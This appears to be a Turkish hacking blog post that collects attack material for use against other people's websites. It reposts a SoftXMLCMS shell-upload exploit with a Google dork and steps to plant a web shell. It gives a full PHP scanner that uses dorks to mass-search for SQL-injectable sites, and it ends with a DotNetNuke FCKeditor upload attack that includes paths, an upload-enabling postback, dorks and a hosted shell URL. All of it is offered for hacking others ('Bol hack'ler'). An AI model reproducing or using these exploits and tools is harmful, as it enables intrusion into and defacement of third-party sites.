SoftXMLCMS Shell Upload Vulnerability (exploit)

Selamun aleyküm..

Ashiyane grup bilmeyen yoktur herhalde, iran`lı grup. Zone-h yada exploit-db takip edenlerler bilirler, herneyse. Konumuz şu 15/04 tarihli exploit yayınlamışlar bende paylaşayım dedim. Açık bir cms `ye ait asp/php farketmez iki tabandada çalışıyor.

###########################################################################

Exploit Title : softxmlcms  Shell Upload Vulnerability

Google Dork : Powered by softxmlcms

Date : 2011-04-15

Author : *Alexander*

Software Link : http://www.softxml.com

Test On : Windows/asp/php

CVE : Web Applications

###########################################################################

===[ Exploit ]===

http://server/[patch]/XMLEditor2.0/uploadfile1.asp

Select the Choose File And Then Browse File.php  Or File.asp

===[ Upload To ]===

http://server/[patch]/images/File.php

Or

http://server/[patch]/images/File.asp

===[ Demo ]===

http://server/softxmlcms/XMLEditor2.0/uploadfile1.asp

###########################################################################

 Açıklayalım hemen..
`Google Dork: ` karşısındaki termi aynen alıp google.com `da taratıyorsunuz.
İleri sayfalara gidin artık bunları söylemeye lüzum yok ama bahsedelim.
Örnek bir site bldunuz diyelim.
www.google.com üzerinen işleyelim.
www.google.com/softxmlcms(exploitte /patch diye geçen kısım)  şimdi buraya tabanı neyse php yada asp ona göre şunu yazıyorsunuz. /images/file.asp or images/file.php. Açığın ismi zaten Shell Upload Vulnerability, shell`inizi upload edip devam edin..
Bol hack`ler..

Dork Scanner Script for SQL inj. /php

Sql injection dork taramak için sonçlara bakıyordum, genç bi arkadaşın blogunda gördüm hoşumada gitti aradım kodlarınada ulaştım, sahini tarafından public edilmiş, endişeye gerek yok.

Sitenize entegre edebilir yahut localde çalıştırabilirsiniz.

<html>
 <head>
 <title>SQL Google Tarayıcı</title>
 <style>
 body{
 background: #0F0F0F;
 color: #FFFFFF;
 font-family: monospace;
 font-size: 12px;
 }
input{
 background: #0F0F0F;
 border: 1px solid #00FF00;
 color: #00FF00;
 }
h2{
 color: #55FF2A;
 }
a{ color: #5A5A5A; text-decoration: none; }
 a:visited, a:active{ color: #5A5A5A; text-decoration: line-through; }
 a:hover{ color: #00FF00; text-decoration: line-through; }
 .effectok:hover { text-decoration: underline; }
 .effectfalse:hover { text-decoration: line-through; }
</style>
</head>
 <body>
<?php
 echo "<h2>SQL Google Tarayıcı</h2>";
 echo "<form action='' method='post'>";
 echo "<b>Dork</b>: <p><input type='text' name='dork' value='inurl:php?=id+site:am'></p>";
 echo "<input type='submit' value='  Ara  '>";
 echo "<hr><br />";
if($_POST['dork']) {
@set_time_limit(0);
 @error_reporting(0);
 @ignore_user_abort(true);
 ini_set('memory_limit', '128M');
$google  =   "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=REPLACE_DORK&num=100&hl=en&as_qdr=all&start=REPLACE_START&sa=N";
$i = 0;
 $a = 0;
 $b = 0;
while($b <= 900) {
 $a = 0;
 flush(); ob_flush();
 echo "Pages: [ $b ]<br />";
 echo "Dork: [ <b>".$_POST['dork']."</b> ]<br />";
 echo "Google sonuçlar alınıyor...<br />";
 flush(); ob_flush();
if(preg_match("/did  not match any documents/",   Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"),   array("".$_POST['dork']."", "$b"), $google)), $val)) {
 echo "Bisey bulunamadı<br />";
 flush(); ob_flush();
 break;
 }
preg_match_all("/<h2  class=(.*?)><a href=\"(.*?)\"  class=(.*?)>/",  Connect_Host(str_replace(array("REPLACE_DORK",  "REPLACE_START"),  array("".$_POST['dork']."", "$b"), $google)), $sites);
 echo "Taranıyor...<br />";
 flush(); ob_flush();
 while(1) {
if(preg_match("/You  have an error in your SQL|Division by zero  in|supplied argument is not  a valid MySQL result resource in|Call to a  member function|Microsoft  JET Database|ODBC Microsoft Access  Driver|Microsoft OLE DB Provider for  SQL Server|Unclosed quotation  mark|Microsoft OLE DB Provider for  Oracle|Incorrect syntax near|SQL  query failed/",  Connect_Host(str_replace("=", "='", $sites[2][$a])))) {
 echo "<a  href='".Clean(str_replace("=", "='", $sites[2][$a]))."'  target='_blank'  class='effectok'>".str_replace("=", "='",   $sites[2][$a])."</a> <== <font color='green'>SQL   Injection Acikli !</font><br />";
 } else {
 echo  "<a href='".Clean(str_replace("=", "='", $sites[2][$a]))."'   target='_blank' class='effectfalse'>".str_replace("=", "='",   $sites[2][$a])."</a> <== <font color='red'>Acik yok   </font><br />";
 flush(); ob_flush();
 }
 if($a > count($sites[2])-2) {
 echo "Bitti<br />";
 break;
 }
 $a = $a+1;
 }
 $b = $b+100;
 }
 }
function Connect_Host($url) {
 $ch = curl_init();
 curl_setopt($ch, CURLOPT_FOLLOW, 0);
 curl_setopt($ch, CURLOPT_HEADER, 1);
 curl_setopt($ch, CURLOPT_URL, $url);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 curl_setopt($ch, CURLOPT_TIMEOUT, 30);
 $data = curl_exec($ch);
 if($data) {
 return $data;
 } else {
 return 0;
 }
 }
function Clean($text) {
 return htmlspecialchars($text, ENT_QUOTES);
 }
?>
</body>
 </html>

Bunun için dork lazım sizi düşündüm bunun için 127 tane  eSQüeLdork vardı elimde onuda vereyim, güle güle tarayıp bulun açıklıları

Dork u taratıyorsunuz, Sayfalarca sonucu linkler halinde verip açıklı olanları SQL Injection var diye belirtiyo kolayca seçebilirsiniz, Olmayanlar zaten Açık yok diyor.

127 Adet dork indirmek için Buraya tıklayın..

Dotnuke asp upload ile hack + vidyo

2010 popüler açıklarından ve 2011 ‘de hala kullanılan Dotnuke açığını ele aldım bu vidyomda. Kısa tutmaya çalışsamda 6dakika tuttu, sıkılmadan izlersiniz inşaallah! Açık daha çok uzakdoğu bilhassa çin sitelerinde, artık aramalarınızı buna göre geliştirebilirsiniz.

- Materyaller (Vidyoda yazacağımı belirtmiştim.)

site sonuna: /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
uplaod aktifleştir: javascript:__doPostBack(‘ctlURL$cmdUpload’,”)
dizin: /portals/0/index.txt
Zehir: http://www.image.ntua.gr/oresteia/private/new_files/nhd.asp
Dork: portals/0/ , portals/1/, portals/2/ …

# Vidyo için buraya tıkla..
# Alternatif Link

Açığın Adı: Dotnuke Asp Upload